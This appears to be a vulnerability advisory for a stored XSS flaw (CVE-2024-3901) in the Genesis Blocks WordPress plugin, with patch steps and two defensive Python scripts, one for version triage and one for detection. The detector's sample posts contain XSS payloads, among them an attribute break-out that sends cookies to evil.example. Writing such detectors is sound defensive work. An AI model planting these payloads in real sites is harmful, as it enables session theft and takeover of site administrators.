CVE-2024-3901

6.8 MEDIUM

📋 TL;DR

The Genesis Blocks WordPress plugin through version 3.1.3 contains a stored cross-site scripting (XSS) vulnerability in its custom blocks. This allows authenticated users with post creation privileges (like contributors) to inject malicious scripts that execute when other users view affected posts. WordPress sites using vulnerable versions of this plugin are affected.

💻 Affected Systems

Products:
  • Genesis Blocks WordPress Plugin
Versions: through 3.1.3
Operating Systems: All
Default Config Vulnerable: ⚠️ Yes
Notes: Requires WordPress installation with Genesis Blocks plugin enabled and at least one user with post creation capabilities (contributor role or higher).

⚠️ Risk & Real-World Impact

🔴

Worst Case

An attacker with contributor access could store a script that runs in the browser of every user who views the post, administrators included. WordPress authentication cookies are set HttpOnly, so the realistic worst case is not cookie theft but session riding: the script can drive wp-admin or the REST API with the administrator's own session and nonce to create a new administrator, install a plugin or change site settings, or it can redirect visitors to a phishing page.

🟠

Likely Case

Malicious contributors or compromised contributor accounts inject tracking or redirect scripts, deface content, or abuse the sessions of other logged-in users who view the crafted posts.

🟢

If Mitigated

With contributor accounts limited to trusted users and the plugin updated to a release that escapes block output, impact is limited to the affected post's own content and no privilege escalation takes place.

🌐 Internet-Facing: HIGH
🏢 Internal Only: MEDIUM

🎯 Exploit Status

Public PoC: ⚠️ Yes
Weaponized: LIKELY
Unauthenticated Exploit: ✅ No
Complexity: LOW

Exploitation requires contributor-level access. The vulnerability is publicly documented with technical details available.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: 3.1.4 or later

Advisory (WPScan, third-party; not a vendor advisory): https://wpscan.com/vulnerability/9502e1ac-346e-4431-90a6-61143d2df37b/

Restart Required: No

Instructions:

1. Log into the WordPress admin panel.
2. Navigate to Plugins → Installed Plugins.
3. Find Genesis Blocks and click 'Update Now' if an update is offered.
4. Alternatively, download version 3.1.4 or later from WordPress.org and update manually.

🔧 Temporary Workarounds

Disable Genesis Blocks Plugin

Platform: all

Temporarily deactivate the vulnerable plugin until it can be updated. Deactivation does not remove payloads a contributor has already saved into post content, so review existing posts as well.

wp plugin deactivate genesis-blocks

Restrict Contributor Access

Platform: all

Temporarily remove the contributor role from untrusted users (or downgrade them to subscriber). The command below leaves the user with no role at all, so they lose the ability to create or edit posts entirely.

wp user remove-role <username> contributor

🧯 If You Can't Patch

  • Deploy a Content Security Policy (CSP) that blocks inline script; this blunts stored XSS, but a policy that strict also breaks the WordPress admin and many themes and plugins, so roll it out in report-only mode first
  • Enable a WordPress security plugin or WAF with XSS payload filtering, keeping in mind that signature filters are bypassable and reduce, rather than remove, the risk

🔍 How to Verify

Check if Vulnerable:

Check WordPress admin → Plugins → Installed Plugins for Genesis Blocks version

Check Version:

wp plugin get genesis-blocks --field=version

Verify Fix Applied:

Confirm Genesis Blocks version is 3.1.4 or higher in plugin details
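The version check above is per site. For a fleet of WordPress installs, the following is an added example (not part of the advisory or of the plugin) that triages captured `wp plugin list --fields=name,status,version --format=json` output from each site, separates "needs the update" from "vulnerable and currently loaded", and compares versions numerically so that, for instance, a future 3.10.x is not mistaken for an old release. The site names and JSON below are constructed.

```python
"""Fleet triage for CVE-2024-3901: flag sites still running Genesis Blocks < 3.1.4.

Added example, not part of the advisory or the plugin. It assumes that for each
site you captured the output of
    wp plugin list --fields=name,status,version --format=json
and feed that JSON in; the site names and JSON below are constructed.
"""
import json
import re
from typing import Optional

PLUGIN_SLUG = "genesis-blocks"
FIXED_VERSION = "3.1.4"                         # first release the advisory lists as fixed
ACTIVE_STATES = {"active", "active-network"}    # wp-cli status values meaning the plugin loads


def parse_version(version: str) -> tuple:
    """Map a version string to a tuple that orders numerically.

    '3.1.3' -> (3, 1, 3, 1)   '3.10.0' -> (3, 10, 0, 1)   '3.1.4-beta1' -> (3, 1, 4, 0)
    A pre-release suffix sorts *below* its final release, so an unreleased
    3.1.4 build is treated as not yet fixed (the conservative choice).
    """
    m = re.match(r"^\s*(\d+(?:\.\d+)*)(.*)$", version)
    if not m:
        raise ValueError(f"unparseable version: {version!r}")
    parts = [int(p) for p in m.group(1).split(".")]
    parts += [0] * (3 - len(parts))              # pad '3.1' to '3.1.0'
    release_flag = 0 if m.group(2).strip() else 1
    return tuple(parts) + (release_flag,)


def is_vulnerable(version: str) -> bool:
    return parse_version(version) < parse_version(FIXED_VERSION)


def triage_site(site: str, plugin_list_json: str) -> Optional[dict]:
    """Return a finding for this site, or None if Genesis Blocks is not installed."""
    for plugin in json.loads(plugin_list_json):
        if plugin.get("name") != PLUGIN_SLUG:
            continue
        vulnerable = is_vulnerable(plugin["version"])
        return {
            "site": site,
            "version": plugin["version"],
            "status": plugin["status"],
            "vulnerable": vulnerable,                                      # needs the update
            "exposed": vulnerable and plugin["status"] in ACTIVE_STATES,  # reachable right now
        }
    return None


def triage_fleet(captures: dict) -> list:
    """captures: {site_name: wp-cli JSON}. Exposed sites first, then merely unpatched ones."""
    findings = [f for site, blob in captures.items() if (f := triage_site(site, blob))]
    return sorted(findings, key=lambda f: (not f["exposed"], not f["vulnerable"], f["site"]))


# Constructed sample captures (not real sites).
SAMPLE_CAPTURES = {
    "blog.example": json.dumps([
        {"name": "akismet", "status": "active", "version": "5.3"},
        {"name": "genesis-blocks", "status": "active", "version": "3.1.3"},
    ]),
    "shop.example": json.dumps([
        {"name": "genesis-blocks", "status": "inactive", "version": "3.1.2"},
    ]),
    "docs.example": json.dumps([
        {"name": "genesis-blocks", "status": "active-network", "version": "3.1.4"},
    ]),
    "intranet.example": json.dumps([
        {"name": "classic-editor", "status": "active", "version": "1.6.3"},
    ]),
}

if __name__ == "__main__":
    for f in triage_fleet(SAMPLE_CAPTURES):
        flag = "EXPOSED" if f["exposed"] else ("UPDATE" if f["vulnerable"] else "ok")
        print(f"{flag:8} {f['site']:20} {f['version']:10} {f['status']}")
```

An inactive but unpatched install is still listed, because the plugin files remain on disk and a later reactivation would silently re-expose the site.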

📡 Detection & Monitoring

Log Indicators:

  • Unusual post edits by contributor accounts
  • Script tags in post content containing Genesis Blocks attributes

Network Indicators:

  • Outbound connections to suspicious domains from WordPress pages

SIEM Query:

source="wordpress" AND (event="post_modified" OR event="plugin_updated") AND plugin="genesis-blocks"

The field and event names above are illustrative; WordPress core does not emit such events on its own, so adjust them to match whatever audit-logging plugin forwards WordPress activity to the SIEM.
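The second log indicator above, script-bearing markup inside Genesis Blocks content, can be hunted directly in the database rather than waiting for a log event. The following is an added example (not part of the advisory or of the plugin) that walks an export of posts such as `wp post list --post_type=post --post_status=any --fields=ID,post_author,post_content --format=json` produces, parses each `genesis-blocks/*` block delimiter pair, and checks both the block's JSON attributes and its saved HTML for generic script sinks. The advisory does not say which block or attribute is left unescaped, so the scanner is deliberately generic; the block names, attribute keys and posts below are constructed for the demonstration.

```python
"""Hunt for script-bearing Genesis Blocks markup in exported WordPress posts.

Added example, not part of the advisory or the plugin. Assumes a JSON array of
posts carrying ID, post_author and post_content. Block names, attribute keys
and the sample posts are constructed; the advisory does not identify the
unescaped attribute, so generic XSS sinks are searched for instead.
"""
import json
import re

# Gutenberg serialises a block as a comment delimiter pair around its saved HTML:
#   <!-- wp:genesis-blocks/NAME {"attr":...} -->...html...<!-- /wp:genesis-blocks/NAME -->
# and a block with no inner HTML as self-closing: <!-- wp:genesis-blocks/NAME {...} /-->
OPEN_RE = re.compile(
    r"<!--\s*wp:genesis-blocks/(?P<name>[a-z0-9-]+)"
    r"(?:\s+(?P<attrs>\{.*?\}))?\s*(?P<selfclose>/)?-->",
    re.S,
)

# Sinks that should never appear in contributor-authored markup, which normally
# passes through wp_kses before it is stored.
INDICATORS = {
    "script_tag": re.compile(r"<\s*script\b", re.I),
    "event_handler": re.compile(r"\bon[a-z]+\s*=", re.I),
    "javascript_uri": re.compile(r"javascript\s*:", re.I),
    "data_html_uri": re.compile(r"data:text/html", re.I),
}


def iter_blocks(content: str):
    """Yield (name, raw_attr_json, inner_html) per genesis-blocks/* block.
    Same-named blocks nested inside each other are not paired; they are rare in practice."""
    pos = 0
    while (m := OPEN_RE.search(content, pos)):
        name, attrs = m.group("name"), m.group("attrs") or "{}"
        pos, inner = m.end(), ""
        if not m.group("selfclose"):
            close = re.search(rf"<!--\s*/wp:genesis-blocks/{re.escape(name)}\s*-->", content[pos:])
            if close:
                inner = content[pos:pos + close.start()]
                pos += close.end()
        yield name, attrs, inner


def _string_values(obj, path):
    """Walk parsed block attributes, yielding (json_path, value) for every string."""
    if isinstance(obj, dict):
        for k, v in obj.items():
            yield from _string_values(v, f"{path}.{k}")
    elif isinstance(obj, list):
        for i, v in enumerate(obj):
            yield from _string_values(v, f"{path}[{i}]")
    elif isinstance(obj, str):
        yield path, obj


def scan_post(post: dict) -> list:
    findings = []
    for name, raw_attrs, inner in iter_blocks(post["post_content"]):
        try:
            targets = list(_string_values(json.loads(raw_attrs), "attrs"))
        except json.JSONDecodeError:
            targets = [("attrs(unparsed)", raw_attrs)]   # malformed JSON: scan it raw
        targets.append(("inner_html", inner))
        for where, text in targets:
            for indicator, rx in INDICATORS.items():
                hit = rx.search(text)
                if hit:
                    findings.append({
                        "post_id": post["ID"], "author": post["post_author"],
                        "block": name, "where": where, "indicator": indicator,
                        "snippet": text[max(0, hit.start() - 20):hit.end() + 40],
                    })
    return findings


def scan_export(posts_json: str, suspect_authors=None) -> list:
    """Scan every post; optionally restrict to a set of author IDs (e.g. all contributors)."""
    return [f for p in json.loads(posts_json)
            if suspect_authors is None or p["post_author"] in suspect_authors
            for f in scan_post(p)]


def _block(name, attrs, inner=""):
    """Serialise a block the way Gutenberg does, used only to build the constructed sample."""
    a = json.dumps(attrs, separators=(",", ":"))
    if inner == "":
        return f"<!-- wp:genesis-blocks/{name} {a} /-->"
    return f"<!-- wp:genesis-blocks/{name} {a} -->{inner}<!-- /wp:genesis-blocks/{name} -->"


# Constructed sample export: author 5 is a contributor, author 2 an editor.
SAMPLE_POSTS = [
    {"ID": 10, "post_author": 5, "post_content": _block(
        "gb-button", {"buttonUrl": "javascript:alert(document.cookie)", "buttonText": "Click"},
        '<div class="gb-button-wrapper"><a class="gb-button" href="javascript:alert(document.cookie)">Click</a></div>')},
    {"ID": 11, "post_author": 5, "post_content": _block(          # attribute break-out, no <script> at all
        "gb-testimonial", {"testimonialName": "x\" onmouseover=\"fetch('https://evil.example/?'+document.cookie)"},
        '<div class="gb-testimonial"><p>ok</p></div>')},
    {"ID": 12, "post_author": 2, "post_content": _block(          # benign nested core block
        "gb-container", {"containerPaddingTop": 2},
        '<div class="gb-container"><!-- wp:paragraph --><p>Hello</p><!-- /wp:paragraph --></div>')},
    {"ID": 13, "post_author": 5, "post_content":                  # self-closing block, nothing to flag
        "<!-- wp:paragraph --><p>Plain text</p><!-- /wp:paragraph -->" + _block("gb-spacer", {"spacerHeight": 30})},
]
SAMPLE_EXPORT = json.dumps(SAMPLE_POSTS)

if __name__ == "__main__":
    for f in scan_export(SAMPLE_EXPORT, suspect_authors={5}):
        print(f"post {f['post_id']} author {f['author']} {f['block']} {f['where']} {f['indicator']}: {f['snippet']!r}")
```

Scanning the JSON attributes separately from the saved HTML matters: a payload that breaks out of an attribute (post 11 above) contains no `<script>` tag and would be missed by a search for script tags alone. Content outside `genesis-blocks/*` delimiters is deliberately not scanned, since that is a different control (wp_kses), not this plugin.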
